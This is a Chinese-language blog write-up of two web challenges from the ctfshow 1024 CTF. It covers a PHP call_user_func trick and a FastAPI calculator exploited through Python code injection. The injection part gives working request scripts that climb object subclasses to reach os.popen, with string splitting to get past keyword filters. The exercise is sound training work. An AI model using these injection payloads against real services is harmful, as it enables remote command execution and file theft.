ctfshow 1024杯 部分web题解

------------恢复内容开始------------

　　今年1024忙得厉害，去大上海参加geekpwn膜拜大佬，几家平台的题目没怎么好好看。特别是小破站的比赛拉跨的一批，bytectf的web到了第二天晚上所有题的题解加在一起还没有10解直接劝退（yuligeyyds！！！）。第回南京之后做了两道1024的题目，难度偏简单，在此记录一下。

　　1.1024_WEB签到

　　开题得源码

　　

 1 <?php
 2
 3 /*
 4 # -*- coding: utf-8 -*-
 5 # @Author: h1xa
 6 # @Date:   2020-10-20 23:59:00
 7 # @Last Modified by:   h1xa
 8 # @Last Modified time: 2020-10-21 03:51:36
 9 # @email: h1xa@ctfer.com
10 # @link: https://ctfer.com
11
12 */
13
14 error_reporting(0);
15 highlight_file(__FILE__);
16 call_user_func($_GET['f']);

　　看到危险函数call_user_func($_GET['f']);  第一反应应该是上传一句话木马getshell，但是这里只传入了一个参数进行执行，还以为是什么奇技淫巧，本地开了一个环境去测试。因为我在ubuntu的php环境是php5，所以在本地使用?f=assert(phpinfo())的时候确实是成功了，但是拿到题目环境里面插入一句话木马一直没能成功，才反应过来是php版本问题。

　　传统的call_user_func 使用方法是call_user_func($func,$value),前面的是要执行的函数名字，后面是传入函数的参数值。一般来说$func传入的是assert，$value传入我们要执行的代码以达到rce的目的（在call_user_func中不能使用eval）。

　　本题因为只有一个传入参数，并且传入的默认为是$value，所以我们先传入phpinfo试试，结果成功得到界面。

　　通过查看phpinfo的信息我们直接发现了一个可执行的函数：

　　传入f=ctfshow_1024执行函数得到flag，简单粗暴。

　　flag{welcome_2_ctfshow_1024_cup}

2.1024_fastapi

　　打开题目得到的是一个json数据，看了一眼题目fastapi，百度告诉我们FastAPI是基于python3.6+和标准python类型的一个现代化的，快速的(高性能),构建api的web框架。

• Fast: 非常高的性能，媲美nodejs和go。可用的最快的Python框架之一.
• Fast to Code 增加了200%~300%开发功能的速度
• Fewer Buys 减少了40%的人为开发错误
• Intuitive 伟大的编辑支持。减少了debug时间。
• Easy 简单的使用和学习设计，减少了阅读文档的时间。
• Short 减少代码重复，每个参数声明的多个特性，更少的错误。
• Robust 获得生产就绪代码。自动交互文档。
• Standards-based 基于开放的标准API: OpenAPI和JSON Schema

　　是python框架啊，那没事了，盲猜ssti。挂一个万能ssti文章：https://www.anquanke.com/post/id/188172。

　　稍微了解了一下fastapi得知它具有方便的api文档/redoc和/docs 在本题中我们尝试打开得到如下界面：

　　看到此站点下还有一个/cccalccc页面，内容是一个计算器的实现，传入参数q应该是一个可以执行的计算式，显然我们的注入点就在这个q上面。几次测试之后发现{payload}能够实现注入，但是发现结果为list或string类型的都Internal Server Error或结果为空，尝试将string切片显示，发现成功出现回显。编写jio本康康有什么可以利用的模块：

1 import requests
2
3 url='http://4cfb3ea5-9890-4c75-a6ef-9e64bfa8abc5.chall.ctf.show/cccalccc'
4 for i in range(500):
5     data={'q':'str([].__class__.__base__.__subclasses__()['+str(i)+'])[1:]'}
6     r=requests.post(url,data)
7     print(i        ,r.text)

本题的环境是python3，所以利用方式要比python2中file模块的调用复杂多了。主要是利用__builtins__中的函数进行文件读取利用等等，而含有__builtins__的内建函数有这些：

(59, <class 'warnings.WarningMessage'>, '__builtins__')
(60, <class 'warnings.catch_warnings'>, '__builtins__')
(61, <class '_weakrefset._IterationGuard'>, '__builtins__')
(62, <class '_weakrefset.WeakSet'>, '__builtins__')
(72, <class 'site._Printer'>, '__builtins__')
(77, <class 'site.Quitter'>, '__builtins__')
(78, <class 'codecs.IncrementalEncoder'>, '__builtins__')
(79, <class 'codecs.IncrementalDecoder'>, '__builtins__')

可以利用的内建函数还有os和linechache等，具体情况具体分析，多看看上面给出的那篇参考文章。

　　刚刚脚本跑出来的内建函数中发现了188.warnings.WarningMessage和189warnings.catch_warnings，可以进行利用

　　尝试列出当前目录下的所有文件

　　

1 import requests
2
3 url = 'http://4cfb3ea5-9890-4c75-a6ef-9e64bfa8abc5.chall.ctf.show/cccalccc'
4 payload = '{str([].__class__.__base__.__subclasses__()[188].__init__.__globals__[\'__builtins__\'][\'__import__\'](\'os\').system(\'ls\'))[1:]}'
5 data = {'q':payload}
6 r = requests.post(url,data)
7 print(r.text)

//{"res":"hack out!","err":false}

　　发现过滤了system和import，import尝试使用im+port进行绕过，system使用popen代替，结尾要使用.read()，不然没有回显。

　　关于popen：

用法：os.popen(command[,mode[,bufsize]])

说明：mode – 模式权限可以是 ‘r’(默认) 或 ‘w’。

popen方法通过p.read()获取终端输出，而且popen需要关闭close().当执行成功时，close()不返回任何值，失败时，close()返回系统返回值（失败返回1）. 可见它获取返回值的方式和os.system不同。

　　把payload改成

payload = '{str([].__class__.__base__.__subclasses__()[189].__init__.__globals__[\'__builtins__\'][\'__imp\'+\'ort__\'](\'os\').__dict__[\'pop\'+\'en\'](\'ls\').read())[1:]}'

　　成功读取到当前的文件列表：{"res":["ain.py\nstart.sh\n"],"err":false}
　　因为我们使用的是切片回显，所以第一个文件应该是main.py，m被切掉了。我们尝试去读取main.py的内容，结果如下：

　　找到提示告诉我们flag在/mnt/f1a9里面，直接读取获得flag：

　　flag{ea066230-29c9-4cbb-b1b9-2e8b4edf4abf}